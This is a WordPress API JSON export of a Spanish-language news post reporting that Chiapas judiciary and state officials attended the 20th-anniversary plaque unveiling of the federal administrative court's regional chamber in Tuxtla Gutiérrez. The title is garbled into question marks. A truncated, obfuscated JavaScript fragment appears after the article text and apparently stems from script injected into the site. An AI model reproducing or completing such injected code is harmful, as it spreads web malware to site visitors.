{"id":9213,"date":"2023-03-28T20:54:33","date_gmt":"2023-03-28T20:54:33","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=9213"},"modified":"2023-03-28T20:54:34","modified_gmt":"2023-03-28T20:54:34","slug":"%f0%9d%90%8f%f0%9d%90%ab%f0%9d%90%9e%f0%9d%90%ac%f0%9d%90%9e%f0%9d%90%a7%f0%9d%90%ad%f0%9d%90%9e-%f0%9d%90%8f%f0%9d%90%a8%f0%9d%90%9d%f0%9d%90%9e%f0%9d%90%ab-%f0%9d%90%89%f0%9d%90%ae%f0%9d%90%9d-2","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=9213","title":{"rendered":"???????? ????? ???????? ?? ?? ?? ??????????? ??? ???????? ??????? ?? ???????? ??????????????"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"662\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/03\/WhatsApp-Image-2023-03-27-at-11.53.57-AM-1024x662.jpeg\" alt=\"\" class=\"wp-image-9214\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/03\/WhatsApp-Image-2023-03-27-at-11.53.57-AM-1024x662.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/03\/WhatsApp-Image-2023-03-27-at-11.53.57-AM-300x194.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/03\/WhatsApp-Image-2023-03-27-at-11.53.57-AM-768x497.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/03\/WhatsApp-Image-2023-03-27-at-11.53.57-AM-1536x994.jpeg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/03\/WhatsApp-Image-2023-03-27-at-11.53.57-AM.jpeg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>28 de Marzo del 2023. Tuxtla Guti\u00e9rrez Chiapas. &#8211; El Poder Judicial del Estado, que encabeza el magistrado presidente del Tribunal Superior de Justicia y del Consejo de la Judicatura del Estado, Guillermo Ramos P\u00e9rez, estuvo presente en la develaci\u00f3n de la placa conmemorativa del XX Aniversario de la Sala Regional de Chiapas, del Tribunal Federal de Justicia Administrativa (TFJA), realizada en el Teatro Universitario de la Universidad de Ciencias y Artes de Chiapas (Unicach).En este acto, asisti\u00f3 en representaci\u00f3n del magistrado presidente, la magistrada coordinadora de Visitadur\u00eda del Poder Judicial del Estado de Chiapas, Mar\u00eda Elena Faviel Barrios, quien en su participaci\u00f3n resalt\u00f3 la importancia de la entrada en funciones de la Sala Regional de Chiapas del Tribunal de Justicia Administrativa.Apunt\u00f3 que, una sociedad necesita de instituciones fuertes y comprometidas con su labor para garantizar el estado de derecho y fortalecer la confianza que la ciudadan\u00eda deposita en sus instituciones y desde el Poder Judicial del Estado de Chiapas, refrend\u00f3 la disposici\u00f3n de abonar al ejercicio compartido que representa la impartici\u00f3n de Justicia desde el respetuoso \u00e1mbito de las competencias, reconociendo a este Tribunal Federal como un aliado.Asisti\u00f3 a este evento, en representaci\u00f3n del Gobernador Constitucional del Estado, Rutilio Escand\u00f3n Cadenas, la secretaria general de Gobierno, Victoria Cecilia Flores P\u00e9rez, quien dijo que la Cuarta Transformaci\u00f3n ha replanteado diversos aspectos que representan un cambio de conciencia en la sociedad; por ello, desde el ejercicio \u00e9tico de la funci\u00f3n p\u00fablica, se debe sostener a la observancia, la procuraci\u00f3n y la aplicaci\u00f3n de la justa ley, como instrumentos para el desarrollo social igualitario.En el pres\u00eddium estuvieron presentes, el presidente del Tribunal Federal de Justicia Administrativa (TFJA), Guillermo Valls Esponda; la presidenta de la Mesa Directiva del Congreso del Estado, Sonia Catalina \u00c1lvarez; el presidente municipal de Tuxtla Guti\u00e9rrez, Carlos Morales V\u00e1zquez y el rector de la Unicach, Juan Jos\u00e9 Sol\u00f3rzano Marcial, entre otras personalidades.Direcci\u00f3n de Comunicaci\u00f3n Social y Relaciones P\u00fablicas61 7 87 00 Ext. 8020\/8021 f : \/poderjudicial.chiapas t : @PJE_Chiapas<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>28 de Marzo del 2023. Tuxtla Guti\u00e9rrez Chiapas. &#8211; El Poder Judicial del Estado, que encabeza el magistrado presidente del Tribunal Superior de Justicia y del Consejo de la Judicatura del Estado, Guillermo Ramos P\u00e9rez, estuvo presente en la develaci\u00f3n de la placa conmemorativa del XX Aniversario de la Sala Regional de Chiapas, del Tribunal &hellip;<\/p>\n","protected":false},"author":2,"featured_media":9214,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-9213","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9213","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9213"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9213\/revisions"}],"predecessor-version":[{"id":9215,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9213\/revisions\/9215"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/9214"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9213"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9213"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9213"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}